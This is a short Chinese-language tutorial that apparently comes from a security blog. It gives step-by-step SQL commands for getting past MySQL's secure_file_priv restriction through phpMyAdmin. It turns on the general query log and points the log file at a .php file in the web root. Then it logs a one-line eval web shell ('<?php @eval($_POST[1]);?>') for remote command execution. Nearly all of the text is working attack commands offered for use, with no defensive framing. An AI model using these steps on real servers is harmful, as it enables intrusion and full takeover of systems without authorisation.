phpMyAdmin突破secure-file-priv写WebShell

2020-05-25 约 319 字预计阅读 1 分钟

1.查看secure_file_priv值

1
2
3
4
5
6


show global variables like '%secure_file_priv%';
# show global variables like '%secure%';

# 此开关默认为NULL：即不允许导入导出
# 没有具体值时：表示不对mysqld 的导入|导出做限制
# 值为/tmp/ ：表示限制mysqld 的导入|导出只能发生在/tmp/目录下

2.查询操作日志存放路径

1
2
3


show variables like 'general_log%';

# 操作日志默认也是关闭的

3.首先打开操作日志记录

1

set global general_log = 'ON';

4.设置操作记录日志路径(前提是获取到了绝对路径)

1
2
3


# set global general_log_file='路径地址';
# 选择网站的目录里面
set global general_log_file='D:\\phpstudy\\PHPTutorial\\WWW\\xx.php'

5.执行sql语句，mysql会将执行的语句内容记录到我们指定的文件中，就可以getshell了

1

select '<?php @eval($_POST[1]);?>';

6.访问webshell，进行后续操作